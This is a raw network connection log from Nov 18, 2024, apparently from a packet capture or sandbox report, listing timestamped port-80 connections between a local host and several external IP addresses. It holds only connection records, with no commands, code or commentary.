                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.287368059 CET6007580192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.292139053 CET806007518.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.292265892 CET806007518.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.310226917 CET805022434.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.310440063 CET5022480192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.316081047 CET805022434.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.316189051 CET5022480192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.323466063 CET6007680192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.328540087 CET806007647.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.328671932 CET6007680192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.328886032 CET6007680192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.328933954 CET6007680192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.333985090 CET806007647.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:46.333997965 CET806007647.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.131247044 CET806007518.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.131488085 CET6007580192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.137603045 CET806007518.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.137715101 CET6007580192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.142724991 CET6007780192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.148947954 CET806007734.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.149064064 CET6007780192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.149171114 CET6007780192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.149194002 CET6007780192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.154776096 CET806007734.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.154807091 CET806007734.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.724160910 CET6007680192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.728338003 CET6007880192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.733354092 CET806007847.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.733443975 CET6007880192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.733603001 CET6007880192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.733647108 CET6007880192.168.2.747.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.738754988 CET806007847.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.738768101 CET806007847.129.31.212192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.990668058 CET806007734.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.990861893 CET6007780192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.996282101 CET806007734.211.97.45192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:47.996340990 CET6007780192.168.2.734.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:48.002470016 CET6007980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:48.008332014 CET806007918.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:48.008424997 CET6007980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:48.008528948 CET6007980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:48.008544922 CET6007980192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:48.013501883 CET806007918.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:48.013520002 CET806007918.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.125025988 CET806008654.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.479319096 CET806008518.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.479554892 CET6008580192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.484971046 CET806008518.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.485044956 CET6008580192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.493257999 CET6008780192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.498194933 CET806008718.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.498270988 CET6008780192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.498421907 CET6008780192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.498442888 CET6008780192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.503333092 CET806008718.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.503357887 CET806008718.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.724163055 CET6008780192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.727503061 CET6008880192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.732619047 CET806008818.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.732728004 CET6008880192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.732872963 CET6008880192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.732897997 CET6008880192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.738091946 CET806008818.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.738106966 CET806008818.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.958764076 CET806008654.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.958919048 CET6008680192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.964991093 CET806008654.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.965061903 CET6008680192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.971302986 CET6008980192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.976886034 CET806008935.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.976954937 CET6008980192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.977080107 CET6008980192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.977107048 CET6008980192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.982826948 CET806008935.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:51.982856989 CET806008935.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.567622900 CET806008818.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.568088055 CET6008880192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.573301077 CET806008818.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.573714018 CET6008880192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.581999063 CET6009080192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.586973906 CET80600903.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.589231968 CET6009080192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.589467049 CET6009080192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.589467049 CET6009080192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.594373941 CET80600903.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.594387054 CET80600903.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.804696083 CET806008935.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.805666924 CET6008980192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.811003923 CET806008935.164.78.200192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.811933041 CET6008980192.168.2.735.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.821659088 CET6009180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.826656103 CET806009154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.829657078 CET6009180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.829658031 CET6009180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.829658031 CET6009180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.834676981 CET806009154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:52.834777117 CET806009154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.262048960 CET80600903.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.264925957 CET6009080192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:53.270381927 CET80600903.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.521845102 CET806009718.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.523787975 CET6009780192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.531903028 CET6009980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.537997961 CET806009954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.541843891 CET6009980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.542011023 CET6009980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.542023897 CET6009980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.546890974 CET806009954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.546902895 CET806009954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.991220951 CET806009854.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.991580963 CET6009880192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.997375965 CET806009854.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:56.997432947 CET6009880192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.007093906 CET6010080192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.013539076 CET80601003.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.013607979 CET6010080192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.013789892 CET6010080192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.013789892 CET6010080192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.018884897 CET80601003.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.018896103 CET80601003.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.414947987 CET806009954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.415177107 CET6009980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.420715094 CET806009954.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.420805931 CET6009980192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.429449081 CET6010180192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.434340000 CET806010118.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.434554100 CET6010180192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.434782028 CET6010180192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.434817076 CET6010180192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.439575911 CET806010118.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.439615965 CET806010118.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.679260969 CET80601003.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.679496050 CET6010080192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.684721947 CET80601003.94.10.34192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.684797049 CET6010080192.168.2.73.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.691510916 CET6010280192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.696332932 CET806010218.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.696423054 CET6010280192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.696517944 CET6010280192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.696536064 CET6010280192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.701409101 CET806010218.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:57.701749086 CET806010218.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.374505043 CET806010218.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.374813080 CET6010280192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.380162954 CET806010218.208.156.248192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.380321026 CET6010280192.168.2.718.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.387526989 CET6010380192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.392702103 CET806010318.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.392818928 CET6010380192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.392973900 CET6010380192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.392999887 CET6010380192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.397937059 CET806010318.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.398288012 CET806010318.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.887406111 CET806010118.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.887676954 CET6010180192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:58.893083096 CET806010118.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.851005077 CET806011154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.851115942 CET6011180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.851247072 CET6011180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.851260900 CET6011180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.856173992 CET806011154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.856194019 CET806011154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.940135956 CET8060110172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.940277100 CET6011080192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.940336943 CET6011080192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.944050074 CET6011280192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.945233107 CET8060110172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.948987007 CET8060112172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.949198008 CET6011280192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.949414015 CET6011280192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.949444056 CET6011280192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.954293966 CET8060112172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:01.954308033 CET8060112172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:02.692650080 CET806011154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:02.692934036 CET6011180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:02.698373079 CET806011154.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:02.698455095 CET6011180192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:02.706281900 CET6011380192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:02.711297035 CET806011318.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:02.711457014 CET6011380192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:02.711532116 CET6011380192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:02.711565018 CET6011380192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:02.716412067 CET806011318.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:02.716428995 CET806011318.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.724220037 CET6011280192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.729255915 CET806011318.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.729461908 CET6011380192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.729504108 CET8060112172.234.222.143192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.729532003 CET806011318.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.729542017 CET806011318.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.729553938 CET6011280192.168.2.7172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.729607105 CET6011380192.168.2.718.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.734375954 CET806011318.246.231.120192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.742276907 CET6011480192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.747113943 CET806011454.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.747142076 CET6011580192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.747198105 CET6011480192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.747306108 CET6011480192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.747359991 CET6011480192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.751961946 CET806011518.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.752026081 CET6011580192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.752181053 CET6011580192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.752208948 CET6011580192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.752268076 CET806011454.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.752564907 CET806011454.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.757028103 CET806011518.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:03.757040977 CET806011518.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:04.587388992 CET806011454.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:04.587723970 CET6011480192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:04.593514919 CET806011454.244.188.177192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:04.593673944 CET6011480192.168.2.754.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:04.601325989 CET6011680192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:09.157387018 CET6012380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:09.157423973 CET6012380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:09.162410021 CET806012318.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:09.162426949 CET806012318.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.618273020 CET806012318.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.618465900 CET6012380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.623738050 CET806012318.141.10.107192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.623851061 CET6012380192.168.2.718.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.649641037 CET6012480192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.655682087 CET806012482.112.184.197192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.655787945 CET6012480192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.655854940 CET6012480192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.655874968 CET6012480192.168.2.782.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.661802053 CET806012482.112.184.197192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.662318945 CET806012482.112.184.197192.168.2.7
